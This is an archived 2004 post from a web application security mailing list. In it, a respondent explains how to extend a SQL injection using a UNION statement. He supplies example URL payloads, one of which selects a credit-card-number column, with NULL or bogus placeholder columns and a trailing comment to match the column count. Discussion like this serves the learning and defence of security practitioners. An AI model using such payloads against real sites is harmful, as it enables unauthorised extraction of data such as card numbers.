WebApp Sec mailing list archives
Re: SQL Injection question
From: lazy () server gwsh gda pl
Date: Wed, 26 May 2004 20:11:06 +0200
On Thu, May 27, 2004 at 01:49:45AM +1000, Serg Belokamen wrote:
I am interested to know (if possible) how to extend an SQL injection attack to display requested information from the injected query rather then the one coded into the software. Attack: http://domain.com/script.php?showdata.php=3;select * from table where id=1
You can use UNION starment http://domain.com/script.php?showdata.php=3' UNION select * from table where id=1 the trick is that 2 queries have to give identical output (same types and number of columns you can do it by using NULL or some bogus data as placeholders. if left query returns 1 integer and a varchar and you want to query for an integer use sth like this showdata.php=3' UNION select "XXX",cc_number from table where id=1-- google for Blindfolded_SQL_Injection.pdf if You want to know more
Current thread:
- httprint version 202 released httprint (May 24)
- SQL Injection question Serg Belokamen (May 26)
- Re: SQL Injection question lazy (May 26)
- Re: SQL Injection question Konstantin V. Sahin (May 27)
- SQL Injection question Serg Belokamen (May 26)